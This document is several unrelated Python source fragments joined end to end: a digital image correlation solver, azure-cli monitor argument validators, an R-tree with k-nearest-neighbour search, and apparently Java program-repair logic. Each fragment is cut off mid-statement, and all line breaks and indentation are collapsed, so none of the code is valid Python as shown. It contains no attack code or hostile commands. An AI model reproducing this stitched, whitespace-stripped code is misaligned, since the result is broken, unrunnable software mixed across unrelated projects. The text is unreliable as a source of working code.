dtype=settings.precision) node_position_t.append(node_coords) reference = gen_ref(node_coords, mesh, images[0], settings, image_id=0) # Correlate the image frames try: for image_id in range(1, settings.max_nr_im): logger.info('Processing frame nr: %i', image_id) if settings.node_hist: if len(settings.node_hist) >= image_id: logger.info("Using initial conditions") node_coords = np.array(settings.node_hist, dtype=settings.precision)[:, :, image_id] else: pass if image_id in settings.ref_update: logger.info('Updating reference at %i', image_id) reference = gen_ref(node_coords, mesh, images[image_id - 1], settings, image_id=(image_id - 1)) img = images[image_id] try: node_coords, Ic, conv = correlator(node_coords, img, reference, settings) if not conv: # Handle the convergence issue if settings.noconvergence == "ignore": pass elif settings.noconvergence == "update": logger.info("Updating reference due to lack of convergence.") reference = gen_ref(node_coords, mesh, images[image_id - 1], settings, image_id - 1) node_coords, Ic, conv = correlator(node_coords, img, reference, settings) if not conv: logger.info("Updating reference did not fix convergence issues, aborting...") break elif settings.noconvergence == "break": logger.info("Aborting due to convergence issues.") break except Exception as e: logger.exception(e) pass if settings.store_internals: Ic_stacks.append(Ic) node_position_t.append(node_coords) finally: return np.array(node_position_t), reference_stack, Ic_stacks def correlate_img_to_ref_q4(node_coordss, img, ref, settings): # Instantiate empty arrays node_coords = node_coordss.copy() img = nd.spline_filter(img, order=settings.interpolation_order) pix_cord_local = [np.zeros((2, ref.Nref_stack[elm_nr].shape[0]), dtype=np.float64) for elm_nr in range(settings.mesh.n_elms)] n_nodes = settings.mesh.n_nodes n_nodes_elm = settings.mesh.element_def.n_nodes di = np.zeros(n_nodes_elm * 2, dtype=np.float64) dnod = np.zeros(n_nodes * 2, dtype=np.float64) C = np.zeros(n_nodes * 2, dtype=np.float64) # Find borders of the elements borders = find_elm_borders_mesh(node_coords, settings.mesh, settings.mesh.n_elms) # Extract image within element borders with padding img_frames = [img[borders[2, el].astype(int) - settings.pad:borders[3, el].astype(int) + settings.pad, borders[0, el].astype(int) - settings.pad:borders[1, el].astype(int) + settings.pad] for el in range(settings.mesh.n_elms)] # Normalize image frame flux if False: img_frames = map(normalized_zero_mean, img_frames) # Element loop # TODO: This implementation does handle errors very pretty... for it in range(settings.maxit): C[:] = 0.0 for el in range(settings.mesh.n_elms): Ic = np.zeros_like(ref.I0_stack[el], dtype=np.float64) # Find current coordinates element within the elm_frame np.dot(ref.Nref_stack[el], node_coords[0, settings.mesh.ele[:, el]] - borders[0, el] + settings.pad, out=pix_cord_local[el][1]) np.dot(ref.Nref_stack[el], node_coords[1, settings.mesh.ele[:, el]] - borders[2, el] + settings.pad, out=pix_cord_local[el][0]) # Determine greyscale value at XYc nd.map_coordinates(img_frames[el], pix_cord_local[el], order=settings.interpolation_order, prefilter=False, output=Ic) # Calculate B^T * dIK np.dot(ref.B_stack[el], (ref.I0_stack[el] - Ic), out=di) # TODO: This shape is awkvard # Order di to match format of K C[(settings.mesh.ele[:, el] + 1) * 2 - 2] += di[:settings.elm.n_nodes] C[(settings.mesh.ele[:, el] + 1) * 2 - 1] += di[settings.elm.n_nodes:] # Calculate position increment as (B^T B)^-1 * (B^T*dIk) "Least squares solution" np.dot(ref.K, C, out=dnod) # Add increment to nodal positions node_coords[0, :] += dnod[::2] node_coords[1, :] += dnod[1::2] # Check for convergence if np.max(np.abs(dnod)) < settings.tol: logging.info('Converged in %s iterations' % it) return node_coords, Ic, True logging.info('Did not converged in %s iterations last increment was %0.4f' % (it, np.max(np.abs(dnod)))) return node_coords, Ic, False # Calculate correlation factor for this element class DICAnalysis(object): def __init__(self, inputs): """ DIC analysis The analysis object verifies and stores the DIC_input object. When instantiated, the .run() method can be called, initiating the DIC analysis. Parameters ---------- inputs : DIC_input object The input object containing all neccessary data for performing a DIC analysis. Returns ------- DIC_analysis object Examples -------- The following example runs a virtual experiment >>> import muDIC as dic >>> import numpy as np >>> import muDIC.vlab as vlab >>> image_shape = (2000, 2000) >>> speckle_image = vlab.rosta_speckle(image_shape, dot_size=4, density=0.32, smoothness=2.0, layers=4) >>> F = np.array([[1.1, .0], [0., 1.0]], dtype=np.float64) >>> image_deformer = vlab.imageDeformer_from_defGrad(F) >>> downsampler = vlab.Downsampler(image_shape=image_shape, factor=4, fill=0.8, pixel_offset_stddev=0.1) >>> noise_injector = vlab.noise_injector("gaussian", sigma=.1) >>> image_generator = vlab.VirtualExperiment(speckle_image=speckle_image, image_deformer=image_deformer, >>> downsampler=downsampler, noise_injector=noise_injector, n=n) >>> image_stack = dic.ImageStack(image_generator) >>> mesher = dic.Mesher(deg_n=1,deg_e=1) >>> mesh = mesher.mesh(image_stack) >>> input = muDIC.solver.correlate.DIC_input(mesh, image_stack) >>> dic_job = dic.DIC_analysis(input) >>> results = dic_job.run() """ self.logger = logging.getLogger() self.__input__ = self.__verify_dic_input__(inputs) def run(self): """ Run analysis Parameters ---------- Returns ------- DIC_output object """ node_x, node_y, reference_stack, Ic_stack = self.__solve__() return DICOutput(node_x, node_y, self.__input__, ref_stack=reference_stack, Ic_stack=Ic_stack) def get_input(self): return self.__input__ def __solve__(self): # TODO: Explicitly check that element fomulation if isinstance(self.__input__.mesh.element_def, BSplineSurface): node_position, reference_stack, Ic_Stack = correlate(self.__input__, correlate_img_to_ref_spline, generate_reference) else: node_position, reference_stack, Ic_Stack = correlate(self.__input__, correlate_img_to_ref_q4, generate_reference_Q4) # TODO: Remove the need of transposing the matrices return node_position[:, 0, :].transpose(), node_position[:, 1, :].transpose(), reference_stack, Ic_Stack @staticmethod def __verify_dic_input__(inputs): """ Input type checker. Verifies all input and calculates missing values if they can be deduced from the others. """ inputs_checked = inputs if not isinstance(inputs_checked, DICInput): raise TypeError('Inputs has to be an instance of the DICInput class') if not isinstance(inputs_checked.images, (ImageStack)): raise TypeError('Image stack is not an instance of ImageStack') if not isinstance(inputs_checked.mesh, Mesh): raise TypeError('Mesh should be an instance of Mesh') if isinstance(inputs_checked.max_nr_im, int) and inputs_checked.max_nr_im <= len(inputs_checked.images): pass else: inputs_checked.max_nr_im = len(inputs_checked.images) if not
<reponame>xaliciayang/azure-cli # -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- from azure.cli.core.commands.validators import validate_tags, get_default_location_from_resource_group from azure.cli.core.azclierror import RequiredArgumentMissingError, InvalidArgumentValueError from knack.util import CLIError def process_autoscale_create_namespace(cmd, namespace): from msrestazure.tools import parse_resource_id validate_tags(namespace) get_target_resource_validator('resource', required=True, preserve_resource_group_parameter=True)(cmd, namespace) if not namespace.resource_group_name: namespace.resource_group_name = parse_resource_id(namespace.resource).get('resource_group', None) get_default_location_from_resource_group(cmd, namespace) def validate_autoscale_recurrence(namespace): from azure.mgmt.monitor.models import Recurrence, RecurrentSchedule, RecurrenceFrequency def _validate_weekly_recurrence(namespace): # Construct days valid_days = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday'] days = [] for partial in namespace.recurrence[1:]: if len(partial) < 2: raise CLIError('specifying fewer than 2 characters for day is ambiguous.') try: match = next(x for x in valid_days if x.lower().startswith(partial.lower())) except StopIteration: raise CLIError("No match for day '{}'.".format(partial)) days.append(match) valid_days.remove(match) # validate, but don't process start and end time recurrence_obj = Recurrence( frequency=RecurrenceFrequency.week, schedule=RecurrentSchedule( time_zone=namespace.timezone, days=days, hours=[], # will be filled in during custom command minutes=[] # will be filled in during custom command ) ) return recurrence_obj valid_recurrence = { 'week': { 'usage': '-r week [DAY DAY ...]', 'validator': _validate_weekly_recurrence } } if namespace.recurrence: raw_values = namespace.recurrence try: delimiter = raw_values[0].lower() usage = valid_recurrence[delimiter]['usage'] try: namespace.recurrence = valid_recurrence[delimiter]['validator'](namespace) except CLIError as ex: raise CLIError('{} invalid usage: {}'.format(ex, usage)) except KeyError: raise CLIError('invalid usage: -r {{{}}} [ARG ARG ...]'.format(','.join(valid_recurrence))) def validate_autoscale_timegrain(namespace): from azure.mgmt.monitor.models import MetricTrigger from azure.cli.command_modules.monitor.actions import get_period_type from azure.cli.command_modules.monitor.util import get_autoscale_statistic_map values = namespace.timegrain if len(values) == 1: # workaround because CMD.exe eats > character... Allows condition to be # specified as a quoted expression values = values[0].split(' ') name_offset = 0 try: time_grain = get_period_type()(values[1]) name_offset += 1 except ValueError: time_grain = get_period_type()('1m') try: statistic = get_autoscale_statistic_map()[values[0]] name_offset += 1 except KeyError: statistic = get_autoscale_statistic_map()['avg'] timegrain = MetricTrigger( metric_name=None, metric_resource_uri=None, time_grain=time_grain, statistic=statistic, time_window=None, time_aggregation=None, operator=None, threshold=None ) namespace.timegrain = timegrain def get_target_resource_validator(dest, required, preserve_resource_group_parameter=False, alias='resource'): def _validator(cmd, namespace): from msrestazure.tools import is_valid_resource_id name_or_id = getattr(namespace, dest) rg = namespace.resource_group_name res_ns = namespace.namespace parent = namespace.parent res_type = namespace.resource_type usage_error = CLIError('usage error: --{0} ID | --{0} NAME --resource-group NAME ' '--{0}-type TYPE [--{0}-parent PARENT] ' '[--{0}-namespace NAMESPACE]'.format(alias)) if not name_or_id and required: raise usage_error if name_or_id: if is_valid_resource_id(name_or_id) and any((res_ns, parent, res_type)): raise usage_error if not is_valid_resource_id(name_or_id): from azure.cli.core.commands.client_factory import get_subscription_id if res_type and '/' in res_type: res_ns = res_ns or res_type.rsplit('/', 1)[0] res_type = res_type.rsplit('/', 1)[1] if not all((rg, res_ns, res_type, name_or_id)): raise usage_error setattr(namespace, dest, '/subscriptions/{}/resourceGroups/{}/providers/{}/{}{}/{}'.format( get_subscription_id(cmd.cli_ctx), rg, res_ns, parent + '/' if parent else '', res_type, name_or_id)) del namespace.namespace del namespace.parent del namespace.resource_type if not preserve_resource_group_parameter: del namespace.resource_group_name return _validator def validate_metrics_alert_dimension(namespace): from azure.cli.command_modules.monitor.grammar.metric_alert.MetricAlertConditionValidator import dim_op_conversion for keyword, value in dim_op_conversion.items(): if namespace.operator == value: namespace.operator = keyword def validate_metrics_alert_condition(namespace): from azure.cli.command_modules.monitor.grammar.metric_alert.MetricAlertConditionValidator import op_conversion, \ agg_conversion, sens_conversion for keyword, value in agg_conversion.items(): if namespace.aggregation == value: namespace.aggregation = keyword break for keyword, value in op_conversion.items(): if namespace.operator == value: namespace.operator = keyword break if namespace.condition_type == 'static': if namespace.threshold is None: raise RequiredArgumentMissingError('Parameter --threshold is required for static threshold.') if namespace.operator not in ('=', '!=', '>', '>=', '<', '<='): raise InvalidArgumentValueError('Parameter --operator {} is invalid for static threshold.'.format( op_conversion[namespace.operator] )) elif namespace.condition_type == 'dynamic': if namespace.operator not in ('>', '<', '><'): raise InvalidArgumentValueError('Parameter --operator {} is invalid for dynamic threshold.'.format( op_conversion[namespace.operator] )) if namespace.alert_sensitivity is None: raise RequiredArgumentMissingError('Parameter --sensitivity is required for dynamic threshold.') for keyword, value in sens_conversion.items(): if namespace.alert_sensitivity == value: namespace.alert_sensitivity = keyword break if namespace.number_of_evaluation_periods is None: setattr(namespace, 'number_of_evaluation_periods', 4) if namespace.number_of_evaluation_periods < 1 or namespace.number_of_evaluation_periods > 6: raise InvalidArgumentValueError('Parameter --num-periods {} should in range 1-6.'.format( namespace.number_of_evaluation_periods )) if namespace.min_failing_periods_to_alert is None: setattr(namespace, 'min_failing_periods_to_alert', min(4, namespace.number_of_evaluation_periods)) if namespace.min_failing_periods_to_alert < 1 or namespace.min_failing_periods_to_alert > 6: raise InvalidArgumentValueError('Parameter --num-violations {} should in range 1-6.'.format( namespace.min_failing_periods_to_alert )) if namespace.min_failing_periods_to_alert > namespace.number_of_evaluation_periods: raise InvalidArgumentValueError( 'Parameter --num-violations {} should be less than or equal to parameter --num-periods {}.'.format( namespace.min_failing_periods_to_alert, namespace.number_of_evaluation_periods)) else: raise NotImplementedError() def validate_diagnostic_settings(cmd, namespace): from azure.cli.core.commands.client_factory import get_subscription_id from msrestazure.tools import is_valid_resource_id, resource_id, parse_resource_id get_target_resource_validator('resource_uri', required=True, preserve_resource_group_parameter=True)(cmd, namespace) if not namespace.resource_group_name: namespace.resource_group_name = parse_resource_id(namespace.resource_uri)['resource_group'] if namespace.storage_account and not is_valid_resource_id(namespace.storage_account): namespace.storage_account = resource_id(subscription=get_subscription_id(cmd.cli_ctx), resource_group=namespace.resource_group_name, namespace='microsoft.Storage', type='storageAccounts', name=namespace.storage_account) if namespace.workspace and not is_valid_resource_id(namespace.workspace): namespace.workspace = resource_id(subscription=get_subscription_id(cmd.cli_ctx), resource_group=namespace.resource_group_name, namespace='microsoft.OperationalInsights', type='workspaces', name=namespace.workspace) if namespace.event_hub and is_valid_resource_id(namespace.event_hub): namespace.event_hub = parse_resource_id(namespace.event_hub)['name'] if namespace.event_hub_rule: if not is_valid_resource_id(namespace.event_hub_rule): if not namespace.event_hub: raise CLIError('usage error: --event-hub-rule ID | --event-hub-rule NAME --event-hub NAME') # use value from --event-hub if the rule is a name namespace.event_hub_rule = resource_id( subscription=get_subscription_id(cmd.cli_ctx), resource_group=namespace.resource_group_name, namespace='Microsoft.EventHub', type='namespaces', name=namespace.event_hub, child_type_1='AuthorizationRules', child_name_1=namespace.event_hub_rule) elif not namespace.event_hub: # extract the event hub name from `--event-hub-rule` if provided as an ID namespace.event_hub = parse_resource_id(namespace.event_hub_rule)['name'] if not any([namespace.storage_account, namespace.workspace, namespace.event_hub]): raise CLIError( 'usage error - expected one or more: --storage-account NAME_OR_ID | --workspace NAME_OR_ID ' '| --event-hub NAME_OR_ID | --event-hub-rule ID') try: del namespace.resource_group_name except AttributeError: pass def _validate_tags(namespace): """ Extracts multiple space-separated tags in key[=value] format """ if isinstance(namespace.tags, list): tags_dict = {} for item in namespace.tags: tags_dict.update(_validate_tag(item)) namespace.tags = tags_dict def _validate_tag(string): """ Extracts a single tag in key[=value] format """ result = {} if string: comps = string.split('=', 1) result = {comps[0]: comps[1]} if len(comps) > 1 else {string: ''} return result def process_action_group_detail_for_creation(namespace): from azure.mgmt.monitor.models import ActionGroupResource, EmailReceiver, SmsReceiver, WebhookReceiver, \ ArmRoleReceiver, AzureAppPushReceiver, ItsmReceiver, AutomationRunbookReceiver, \ VoiceReceiver, LogicAppReceiver, AzureFunctionReceiver _validate_tags(namespace) ns = vars(namespace) name = ns['action_group_name'] receivers = ns.pop('receivers') or [] action_group_resource_properties = { 'location': 'global', # as of now, 'global' is the only available location for action group 'group_short_name': ns.pop('short_name') or name[:12], # '12' is the short name length limitation 'email_receivers': [r for r in receivers if isinstance(r, EmailReceiver)], 'sms_receivers': [r for r in receivers if isinstance(r, SmsReceiver)], 'webhook_receivers': [r for r in receivers if isinstance(r, WebhookReceiver)], 'arm_role_receivers': [r for r in receivers if isinstance(r, ArmRoleReceiver)], 'itsm_receivers': [r for r in receivers if isinstance(r, ItsmReceiver)], 'azure_app_push_receivers': [r for r in receivers if isinstance(r, AzureAppPushReceiver)], 'automation_runbook_receivers': [r for r in receivers if isinstance(r, AutomationRunbookReceiver)], 'voice_receivers': [r for r in receivers if isinstance(r, VoiceReceiver)], 'logic_app_receivers': [r for r in receivers if isinstance(r, LogicAppReceiver)], 'azure_function_receivers': [r for r in receivers if isinstance(r, AzureFunctionReceiver)], 'tags': ns.get('tags') or None } ns['action_group'] = ActionGroupResource(**action_group_resource_properties) def validate_metric_dimension(namespace): if not namespace.dimension: return if namespace.filters: raise CLIError('usage: --dimension and --filter parameters are mutually exclusive.') namespace.filters = ' and '.join("{} eq '*'".format(d) for d in namespace.dimension) def process_webhook_prop(namespace): if not isinstance(namespace.webhook_properties, list): return result = {} for each in namespace.webhook_properties: if each: if '=' in each: key, value = each.split('=', 1) else: key, value = each, '' result[key] = value namespace.webhook_properties = result def get_action_group_validator(dest): def validate_action_groups(cmd, namespace): action_groups = getattr(namespace, dest, None) if not action_groups: return from msrestazure.tools import is_valid_resource_id, resource_id from azure.cli.core.commands.client_factory import get_subscription_id subscription = get_subscription_id(cmd.cli_ctx) resource_group = namespace.resource_group_name for group in action_groups: if not is_valid_resource_id(group.action_group_id): group.action_group_id = resource_id( subscription=subscription, resource_group=resource_group, namespace='microsoft.insights', type='actionGroups', name=group.action_group_id ) return validate_action_groups def get_action_group_id_validator(dest): def validate_action_group_ids(cmd, namespace): action_groups = getattr(namespace, dest, None) if not action_groups: return from msrestazure.tools import is_valid_resource_id, resource_id from azure.cli.core.commands.client_factory import get_subscription_id action_group_ids = [] subscription = get_subscription_id(cmd.cli_ctx) resource_group = namespace.resource_group_name for group in action_groups: if not is_valid_resource_id(group): group = resource_id( subscription=subscription, resource_group=resource_group, namespace='microsoft.insights', type='actionGroups', name=group ) action_group_ids.append(group.lower()) setattr(namespace, dest, action_group_ids) return validate_action_group_ids def validate_private_endpoint_connection_id(namespace): if namespace.connection_id: from azure.cli.core.util import parse_proxy_resource_id result = parse_proxy_resource_id(namespace.connection_id) namespace.resource_group_name = result['resource_group'] namespace.scope_name = result['name'] namespace.private_endpoint_connection_name = result['child_name_1'] if not all([namespace.scope_name, namespace.resource_group_name, namespace.private_endpoint_connection_name]): raise CLIError('incorrect usage. Please provide [--id ID] or [--name NAME --scope-name NAME -g NAME]') del namespace.connection_id def validate_storage_accounts_name_or_id(cmd, namespace): if namespace.storage_account_ids: from msrestazure.tools import is_valid_resource_id, resource_id from azure.cli.core.commands.client_factory import get_subscription_id for index, storage_account_id in enumerate(namespace.storage_account_ids): if not is_valid_resource_id(storage_account_id): namespace.storage_account_ids[index] = resource_id( subscription=get_subscription_id(cmd.cli_ctx), resource_group=namespace.resource_group_name, namespace='Microsoft.Storage', type='storageAccounts', name=storage_account_id ) def process_subscription_id(cmd, namespace): from azure.cli.core.commands.client_factory import get_subscription_id namespace.subscription_id = get_subscription_id(cmd.cli_ctx) def process_workspace_data_export_destination(namespace): if namespace.destination: from azure.mgmt.core.tools import is_valid_resource_id, resource_id, parse_resource_id if not is_valid_resource_id(namespace.destination): raise CLIError('usage error: --destination should be a storage account, ' 'an evenhug namespace or an event hub resource id.') result = parse_resource_id(namespace.destination) if result['namespace'].lower() == 'microsoft.storage' and result['type'].lower() == 'storageaccounts': namespace.data_export_type = 'StorageAccount' elif result['namespace'].lower() == 'microsoft.eventhub' and result['type'].lower() == 'namespaces': namespace.data_export_type = 'EventHub' namespace.destination = resource_id( subscription=result['subscription'], resource_group=result['resource_group'], namespace=result['namespace'],
# 2015-05-22 # r-tree featuring insert, nn and k-nn search with threshold distance # tie-breaking for same distance is identifier value with largest values appearing earlier # updated on 2016-08-22 to fix some bugs and re-structure # updated on 2016-08-23 to fix traditional/non-traditional isLeafNode() distinction # updated on 2016-11-02 to re-structure and modify adjustTree(); # stop at root instead of non-existent parent of root; # note that there is a bug with setting M to two # updated on 2016-11-03 to implement delete(); # note, however, that our tree lacks entry-aware nodes # updated on 2016-11-05 to fix delete() by making addition of entries idempotent import heapq class PriorityQueue: """ Implements a priority queue data structure. Each inserted item has a priority associated with it and the client is usually interested in quick retrieval of the lowest-priority item in the queue. This data structure allows O(1) access to the lowest-priority item. Note that this PriorityQueue does not allow you to change the priority of an item. However, you may insert the same item multiple times with different priorities. """ # priorities are (-1 * distance, -1 * id-value) pairs def __init__(self): self.heap = [] def push(self, item, priority): pair = (priority,item) heapq.heappush(self.heap,pair) def pop(self): (priority,item) = heapq.heappop(self.heap) return item def isEmpty(self): return len(self.heap) == 0 # returns a (priority, item) pair def peek(self): heap = self.heap pair = heap[0] # item = pair[1] result = pair return result def toList(self): pair_list = self.heap items = [x[1] for x in pair_list] return items def getSize(self): return len(self.heap) import math def getDistance(point1, point2): x1, y1 = point1 x2, y2 = point2 change_x = x2 - x1 change_y = y2 - y1 distance = math.sqrt(change_x ** 2 + change_y ** 2) return distance class NearestNeighbor: def __init__(self, close_item = None, distance = float("inf")): self.close_item = close_item self.distance = distance def getCloseItem(self): return self.close_item def getDistance(self): return self.distance def setCloseItem(self, close_item): self.close_item = close_item def setDistance(self, distance): self.distance = distance def toString(self): result_str = str(self.getCloseItem()) + " " + str(self.getDistance()) return result_str class KNearestNeighbor: def __init__(self, query_point, close_item_pq, k = 100): self.query_point = query_point # priority queue we use uses a min-heap # as a result, we negate priorities self.close_item_pq = close_item_pq self.k = k # note that we do not always retrieve k items - could be less or could be more due to threshold def getCloseItems(self): return (self.close_item_pq).toList() # have special behavior for when no items are in queue def getFarthestCloseDistance(self): if self.getNumCloseItems() == 0: return float("inf") else: result = (self.close_item_pq).peek() priority, item = result # distance = -1 * priority distance = -1 * priority[0] id_value = priority[1] # print "distance:", distance return distance def addCloseItem(self, close_item): point = close_item # id_value = point.getIDValue() query_point = self.query_point point_location = (point.getX(), point.getY()) id_value = point.getIDValue() # distance = getDistance(query_point, point_location) distance = getDistance(query_point, point_location) priority = (-1 * distance, id_value) # print "priority:", priority (self.close_item_pq).push(close_item, priority) def removeCloseItem(self): (self.close_item_pq).pop() def getNumCloseItems(self): # print self.close_item_pq.getSize() return (self.close_item_pq).getSize() def addAndRemoveIfNecessary(self, close_item): # print close_item, self.isFull() # do_remove = self.isFull() == True # use this so that we have enough to work with when we sort and cull # print "close item:", close_item do_remove = self.isFull() == True and self.passesThresholdForFarthestCloseItem(close_item) == True # do_remove = self.isFull() == True self.addCloseItem(close_item) if do_remove == True: self.removeCloseItem() def isFull(self): return self.getNumCloseItems() >= self.k # returns True if distance for item 'close_item' is >= 0.001 that of the farthest close item def passesThresholdForFarthestCloseItem(self, close_item): distance = self.getFarthestCloseDistance() query_point = self.query_point point = close_item point_location = (point.getX(), point.getY()) curr_distance = getDistance(query_point, point_location) return curr_distance > distance + 0.001 def toString(self): close_items = self.getCloseItems() # print close_items close_item_str_list = [str(x) for x in close_items] close_item_str = string.join(close_item_str_list, " ") result_str = close_item_str + " " + str(self.getFarthestCloseDistance()) return result_str # internal nodes have entries # have one-to-one relationship between nodes and entries class RTreeNode: def __init__(self, parent, entries, is_leaf): self.parent = parent # self.entries = entries self.is_leaf = is_leaf """ self.m = 1 self.M = 4 """ self.m = 8 self.M = 16 self.child_to_entry_dict = {} for entry in entries: curr_child = entry.getChild() (self.child_to_entry_dict)[curr_child] = entry def getParent(self): return self.parent def getEntries(self): # return self.entries return (self.child_to_entry_dict).values() def getEntryForChild(self, child_node): return (self.child_to_entry_dict)[child_node] def getChildren(self): """ entries = self.getEntries() children = [x.getChild() for x in entries] return children """ return (self.child_to_entry_dict).keys() def getNumEntries(self): # return len(self.getEntries()) return len(self.child_to_entry_dict) def getNumChildren(self): # return len(self.getChildren()) return self.getNumEntries() def setParent(self, node): self.parent = node """ def isTraditionalLeafNode(self): is_traditional_leaf_node = self.getNumEntries() == 0 return is_traditional_leaf_node """ def isNonTraditionalLeafNode(self): is_non_traditional_leaf_node = (self.getParent() == None and self.getNumChildren() == 0) or (self.getNumChildren() != 0 and False not in [x.getChild().getNumEntries() == 0 for x in self.getEntries()]) return is_non_traditional_leaf_node def isLeafNode(self): return self.getNumChildren() == 0 # return self.is_leaf # is_leaf_node = (self.getParent() == None and self.getNumChildren() == 0) or (self.getNumChildren() != 0 and False not in [x.getChild().getNumEntries() == 0 for x in self.getEntries()]) # is_leaf_node = (self.getParent() == None and self.getNumChildren() == 0) or (self.getNumChildren() != 0 and True in [x.getChild().getNumEntries() == 0 for x in self.getEntries()]) return is_leaf_node def setIsLeafNode(self, is_leaf): self.is_leaf = is_leaf def addEntry(self, entry): # print "adding an entry:", entry.getMBR().toString() # (self.entries).append(entry) # now idempotent curr_child = entry.getChild() (self.child_to_entry_dict)[curr_child] = entry # entry must match exactly def removeEntry(self, entry): # index = (self.entries).index(entry) # (self.entries).pop(index) curr_child = entry.getChild() (self.child_to_entry_dict).pop(curr_child) def getMinimumNumEntriesPerNode(self): return self.m def getMaximumNumEntriesPerNode(self): return self.M def isFull(self): return self.getNumEntries() >= self.getMaximumNumEntriesPerNode() def isUnderfull(self): return self.getNumEntries() < self.getMinimumNumEntriesPerNode() """ # indexing starts at zero def getIndexForEntry(self, entry): index = (self.entries).index(entry) return index def removeIthEntry(self, i): (self.entries).pop(i) """ def retrieveEntryForChild(self, node): entries = self.getEntries() children = [x.getChild() for x in entries] # print "children:", [x.toString() for x in children] # print "child:", node.toString() # print "mbr's:", [x.getMBR().toString() for x in entries] index = children.index(node) chosen_entry = entries[index] return chosen_entry """ # indexing starts at zero def getIthEntry(self, i): return (self.entries)[i] """ def toString(self): return str(self.getEntries()) # an entry is effectively an (mbr, child) pair # mbr may be composite or raw class RTreeEntry: def __init__(self, mbr, child): self.mbr = mbr self.child = child def getMBR(self): return self.mbr def setMBR(self, mbr): self.mbr = mbr def getChild(self): return self.child def setChild(self, node): self.child = node # x goes from left (negative) to right (positive) # y goes from top (negative) to bottom (positive) class MBR: def __init__(self, upper_left, lower_right): self.upper_left = upper_left self.lower_right = lower_right def isRaw(self): return False def isComposite(self): return False def getUpperLeft(self): return self.upper_left def getLowerRight(self): return self.lower_right def getArea(self): upper_left = self.getUpperLeft() lower_right = self.getLowerRight() x1, y1 = upper_left x2, y2 = lower_right side1_length = x2 - x1 side2_length = y2 - y1 area = side1_length * side2_length return area # require that base_mbr is composite and mbr is raw or composite # return a composite MBR object @staticmethod def getEnlargedMBR(base_mbr, mbr): mbr_list = [base_mbr, mbr] upper_left_points = [x.getUpperLeft() for x in mbr_list] lower_right_points = [x.getLowerRight() for x in mbr_list] points = upper_left_points + lower_right_points x_values = [x[0] for x in points] y_values = [x[1] for x in points] min_x_value = min(x_values) max_x_value = max(x_values) min_y_value = min(y_values) max_y_value = max(y_values) upper_left_point = (min_x_value, min_y_value) lower_right_point = (max_x_value, max_y_value) result_mbr_list = base_mbr.getMBRList() + [mbr] mbr = CompositeMBR(upper_left_point, lower_right_point, result_mbr_list) return mbr @staticmethod def getAreaEnlargement(base_mbr, mbr): base_mbr_area = base_mbr.getArea() enlarged_mbr = MBR.getEnlargedMBR(base_mbr, mbr) enlarged_mbr_area = enlarged_mbr.getArea() area_change = enlarged_mbr_area - base_mbr_area return area_change @staticmethod def doOverlap(mbr_a, mbr_b): upper_left_a = mbr_a.getUpperLeft() lower_right_a = mbr_a.getLowerRight() upper_left_b = mbr_b.getUpperLeft() lower_right_b = mbr_b.getLowerRight() x1_a, y1_a = upper_left_a x2_a, y2_a = lower_right_a x1_b, y1_b = upper_left_b x2_b, y2_b = lower_right_b do_overlap = x1_a <= x2_b and x2_a >= x1_b and y1_a <= y2_b and y2_a >= y1_b return do_overlap def toString(self): upper_left = self.getUpperLeft() lower_right = self.getLowerRight() x1, y1 = upper_left x2, y2 = lower_right return "[" + str(x1) + ", " + str(y1) + ", " + str(x2) + ", " +
x.father = node.father if change: node = Node('root', -1) node.child.append(copynode) copynode.father = node ans.solveroot = node#copynode ans.type = type #print(node.printTree(ans.solveroot)) else: ans.solveroot = ans.root ans.type = type #print(copynode.printTree(copynode)) #assert(0) return import re def replaceVar(root, rrdict): if root.name in rrdict: root.name = rrdict[root.name] elif len(root.child) == 0: if re.match('loc%d', root.name) is not None or re.match('par%d', root.name) is not None: return False ans = True for x in root.child: ans = ans and replaceVar(x, rrdict) return ans def getUnknown(root): if root.name == 'unknown': return [root] ans = [] for x in root.child: ans.extend(getUnknown(x)) return ans def solveUnknown(ans, vardic, typedic, classcontent, sclassname, mode): nodes = getUnknown(ans.solveroot) fans = [] if len(nodes) >= 2: return [] elif len(nodes) == 0: #print(ans.root.printTree(ans.solveroot)) return [ans.root.printTree(ans.solveroot)] else: #print(2) unknown = nodes[0] if unknown.father.father and unknown.father.father.name == 'MethodInvocation': classname = '' args = [] print('method') if unknown.father.name == 'member': for x in unknown.father.father.child: if x.name == 'qualifier': print(x.child[0].name, typedic) if x.child[0].name in typedic: classname = typedic[x.child[0].name] break else: if sclassname == 'org.jsoup.nodes.Element': sclassname = 'org.jsoup.nodes.Node' for f in classcontent[sclassname + '.java']['classes'][0]['fields']: print(x.child[0].name, f['name']) if f['name'] == x.child[0].name[:-4]: classname = f['type'] break for x in unknown.father.father.child: if x.name == 'arguments': for y in x.child: if y.name == 'MemberReference': try: if y.child[0].child[0].name in typedic: args.append(typedic[y.child[0].child[0].name]) else: #print(6, y.child[0].child[0].name) args.append('int')#return [] except: #print('gg2') return [] elif y.name == 'Literal': if y.child[0].child[0].name == "<string>_er": args.append("String") else: args.append("int") else: print('except') return [] print(7, classname) if classname == '': classbody = classcontent[sclassname + '.java']['classes'] elif classname != '': if classname + ".java" not in classcontent: #print(5, classname ) return [] classbody = classcontent[classname + '.java']['classes'] #print(5, sclassname, classbody, classname) #print(8) if unknown.father.name == 'qualifier': vtype = "" for x in classbody[0]['fields']: #print(x) if x['name'] == ans.type[:-4]: vtype = x['type'] break if 'IfStatement' in ans.getTreestr(): if mode == 1 and len(ans.solveroot.child) == 1: #print(ans.solveroot.printTree(ans.solveroot)) return [] #print(ans.solveroot.printTree(ans.solveroot)) if unknown.father.name == 'member': for x in classbody[0]['methods']: if len(x['params']) == 0 and x['type'] == 'boolean': unknown.name = x['name'] + "_ter" #print('gggg', unknown.printTree(ans.solveroot)) fans.append(unknown.printTree(ans.solveroot)) elif unknown.father.name == 'qualifier': for x in classbody[0]['fields']: if x['type'] == vtype: unknown.name = x['name'] + "_ter" fans.append(unknown.printTree(ans.solveroot)) else: #print("a", args) if mode == 0 and ans.root == ans.solveroot and len(args) == 0 and classname != 'EndTag': return [] otype = "" if classname == 'EndTag': otype = "String" if mode == 0 and ans.type != '': args = [] if ans.type == "valid": return [] for m in classbody[0]['methods']: #print(m['name']) if m['name'] == ans.type[:-4]: otype = m['type'] for y in m['params']: args.append(y['type']) break #print(args, ans.type, 'o') if unknown.father.name == 'member': #print(mode, ans.type, args) for x in classbody[0]['methods']: #print(x) print(x['type'], otype, x['name'], ans.type) if 